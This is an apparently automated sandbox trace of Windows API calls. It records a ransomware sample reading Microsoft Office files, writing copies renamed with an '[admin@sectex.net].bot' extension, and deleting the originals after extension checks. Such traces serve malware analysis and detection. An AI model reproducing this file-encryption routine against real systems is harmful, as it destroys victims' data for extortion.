	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString=".jpg") returned 4
	[0144.056] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString=".doc") returned 4
	[0144.056] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString=".docx") returned 5
	[0144.056] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1
	[0144.056] lstrlenW (lpString=".pdf") returned 4
	[0144.056] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString=".xls") returned 4
	[0144.056] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0144.056] lstrlenW (lpString=".xlsx") returned 5
	[0144.056] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1
	[0144.056] lstrlenW (lpString=".ppt") returned 4
	[0144.056] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0144.056] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.056] lstrlenW (lpString=".zip") returned 4
	[0144.056] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0144.057] lstrlenW (lpString=".rar") returned 4
	[0144.057] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0144.057] lstrlenW (lpString=".bz2") returned 4
	[0144.057] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0144.057] lstrlenW (lpString=".7z") returned 3
	[0144.057] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0144.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.057] lstrlenW (lpString=".dbf") returned 4
	[0144.057] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0144.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.057] lstrlenW (lpString=".1cd") returned 4
	[0144.057] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0144.057] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60
	[0144.057] lstrlenW (lpString=".jpg") returned 4
	[0144.057] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0144.057] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0144.057] lstrlenW (lpString="DRILLDWN.VSL") returned 12
	[0144.057] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.058] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=64872) returned 1
	[0144.058] CloseHandle (hObject=0x3c0) returned 1
	[0144.058] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 0x20
	[0144.059] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0144.059] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.059] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.059] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.059] GetLastError () returned 0x0
	[0144.060] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xfd68, lpOverlapped=0x0) returned 1
	[0144.063] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfd70, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfd70, lpOverlapped=0x0) returned 1
	[0144.065] ReadFile (in: hFile=0x3c0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.065] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0144.065] SetEndOfFile (hFile=0x31c) returned 1
	[0144.065] CloseHandle (hObject=0x31c) returned 1
	[0144.065] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.065] SetEndOfFile (hFile=0x3c0) returned 1
	[0144.068] CloseHandle (hObject=0x3c0) returned 1
	[0144.068] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.068] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 1
	[0144.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.069] lstrlenW (lpString=".doc") returned 4
	[0144.069] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.069] lstrlenW (lpString=".docx") returned 5
	[0144.069] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1
	[0144.069] lstrlenW (lpString=".pdf") returned 4
	[0144.069] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.069] lstrlenW (lpString=".xls") returned 4
	[0144.069] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.069] lstrlenW (lpString=".xlsx") returned 5
	[0144.069] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1
	[0144.069] lstrlenW (lpString=".ppt") returned 4
	[0144.069] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.069] lstrlenW (lpString=".zip") returned 4
	[0144.069] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.069] lstrlenW (lpString=".rar") returned 4
	[0144.069] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.069] lstrlenW (lpString=".bz2") returned 4
	[0144.069] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.069] lstrlenW (lpString=".7z") returned 3
	[0144.069] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.069] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.069] lstrlenW (lpString=".dbf") returned 4
	[0144.070] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString=".1cd") returned 4
	[0144.070] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString=".jpg") returned 4
	[0144.070] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString=".doc") returned 4
	[0144.070] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString=".docx") returned 5
	[0144.070] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1
	[0144.070] lstrlenW (lpString=".pdf") returned 4
	[0144.070] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString=".xls") returned 4
	[0144.070] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.070] lstrlenW (lpString=".xlsx") returned 5
	[0144.070] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1
	[0144.070] lstrlenW (lpString=".ppt") returned 4
	[0144.070] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString=".zip") returned 4
	[0144.070] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.070] lstrlenW (lpString=".rar") returned 4
	[0144.070] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString=".bz2") returned 4
	[0144.070] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.070] lstrlenW (lpString=".7z") returned 3
	[0144.070] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.070] lstrlenW (lpString=".dbf") returned 4
	[0144.071] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.071] lstrlenW (lpString=".1cd") returned 4
	[0144.071] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60
	[0144.071] lstrlenW (lpString=".jpg") returned 4
	[0144.071] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.071] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0144.071] lstrlenW (lpString="DWGCNV.VSL") returned 10
	[0144.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3cc
	[0144.295] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=38752) returned 1
	[0144.295] CloseHandle (hObject=0x3cc) returned 1
	[0144.295] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl")) returned 0x20
	[0144.333] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0144.333] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.333] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0144.333] GetLastError () returned 0x0
	[0144.334] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x9760, lpOverlapped=0x0) returned 1
	[0144.363] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x9770, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x9770, lpOverlapped=0x0) returned 1
	[0144.364] ReadFile (in: hFile=0x398, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0144.364] WriteFile (in: hFile=0x31c, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0144.364] SetEndOfFile (hFile=0x31c) returned 1
	[0144.364] CloseHandle (hObject=0x31c) returned 1
	[0144.365] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0144.365] SetEndOfFile (hFile=0x398) returned 1
	[0144.367] CloseHandle (hObject=0x398) returned 1
	[0144.367] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0144.367] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dwgcnv.vsl")) returned 1
	[0144.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.368] lstrlenW (lpString=".doc") returned 4
	[0144.368] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.368] lstrlenW (lpString=".docx") returned 5
	[0144.368] lstrcmpiW (lpString1=".docx", lpString2="V.VSL") returned -1
	[0144.368] lstrlenW (lpString=".pdf") returned 4
	[0144.368] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.368] lstrlenW (lpString=".xls") returned 4
	[0144.368] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.368] lstrlenW (lpString=".xlsx") returned 5
	[0144.368] lstrcmpiW (lpString1=".xlsx", lpString2="V.VSL") returned -1
	[0144.368] lstrlenW (lpString=".ppt") returned 4
	[0144.368] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.368] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.368] lstrlenW (lpString=".zip") returned 4
	[0144.368] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.368] lstrlenW (lpString=".rar") returned 4
	[0144.368] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.368] lstrlenW (lpString=".bz2") returned 4
	[0144.369] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString=".7z") returned 3
	[0144.369] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.369] lstrlenW (lpString=".dbf") returned 4
	[0144.369] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.369] lstrlenW (lpString=".1cd") returned 4
	[0144.369] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.369] lstrlenW (lpString=".jpg") returned 4
	[0144.369] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.369] lstrlenW (lpString=".doc") returned 4
	[0144.369] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString=".docx") returned 5
	[0144.369] lstrcmpiW (lpString1=".docx", lpString2="V.VSL") returned -1
	[0144.369] lstrlenW (lpString=".pdf") returned 4
	[0144.369] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString=".xls") returned 4
	[0144.369] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0144.369] lstrlenW (lpString=".xlsx") returned 5
	[0144.369] lstrcmpiW (lpString1=".xlsx", lpString2="V.VSL") returned -1
	[0144.369] lstrlenW (lpString=".ppt") returned 4
	[0144.369] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0144.369] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.370] lstrlenW (lpString=".zip") returned 4
	[0144.370] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0144.370] lstrlenW (lpString=".rar") returned 4
	[0144.370] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0144.370] lstrlenW (lpString=".bz2") returned 4
	[0144.370] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0144.370] lstrlenW (lpString=".7z") returned 3
	[0144.370] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0144.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.370] lstrlenW (lpString=".dbf") returned 4
	[0144.370] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0144.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.370] lstrlenW (lpString=".1cd") returned 4
	[0144.370] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0144.370] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DWGCNV.VSL") returned 58
	[0144.370] lstrlenW (lpString=".jpg") returned 4
	[0144.370] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0144.370] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0144.370] lstrlenW (lpString="EntityPickerIntl.dll") returned 20
	[0144.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0144.387] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=24456) returned 1
	[0144.387] CloseHandle (hObject=0x38c) returned 1
	[0144.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll")) returned 0x20
	[0144.393] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0144.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\entitypickerintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0144.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.393] lstrlenW (lpString=".doc") returned 4
	[0144.393] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0144.393] lstrlenW (lpString=".docx") returned 5
	[0144.393] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0144.393] lstrlenW (lpString=".pdf") returned 4
	[0144.393] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0144.393] lstrlenW (lpString=".xls") returned 4
	[0144.393] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0144.393] lstrlenW (lpString=".xlsx") returned 5
	[0144.393] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0144.394] lstrlenW (lpString=".ppt") returned 4
	[0144.394] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString=".zip") returned 4
	[0144.394] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString=".rar") returned 4
	[0144.394] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString=".bz2") returned 4
	[0144.394] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0144.394] lstrlenW (lpString=".7z") returned 3
	[0144.394] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString=".dbf") returned 4
	[0144.394] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString=".1cd") returned 4
	[0144.394] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString=".jpg") returned 4
	[0144.394] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.394] lstrlenW (lpString=".doc") returned 4
	[0144.394] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString=".docx") returned 5
	[0144.394] lstrcmpiW (lpString1=".docx", lpString2="l.dll") returned -1
	[0144.394] lstrlenW (lpString=".pdf") returned 4
	[0144.394] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString=".xls") returned 4
	[0144.394] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0144.394] lstrlenW (lpString=".xlsx") returned 5
	[0144.394] lstrcmpiW (lpString1=".xlsx", lpString2="l.dll") returned -1
	[0144.394] lstrlenW (lpString=".ppt") returned 4
	[0144.395] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0144.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.395] lstrlenW (lpString=".zip") returned 4
	[0144.395] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0144.395] lstrlenW (lpString=".rar") returned 4
	[0144.395] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0144.395] lstrlenW (lpString=".bz2") returned 4
	[0144.395] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0144.395] lstrlenW (lpString=".7z") returned 3
	[0144.395] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0144.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.395] lstrlenW (lpString=".dbf") returned 4
	[0144.395] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0144.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.395] lstrlenW (lpString=".1cd") returned 4
	[0144.395] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0144.395] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EntityPickerIntl.dll") returned 68
	[0144.395] lstrlenW (lpString=".jpg") returned 4
	[0144.395] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0144.395] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0144.395] lstrlenW (lpString="ENVELOPR.DLL") returned 12
	[0144.395] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0144.396] GetFileSizeEx (in: hFile=0x384, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=17288) returned 1
	[0144.396] CloseHandle (hObject=0x384) returned 1
	[0144.396] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ENVELOPR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\envelopr.dll")) returned 0x20
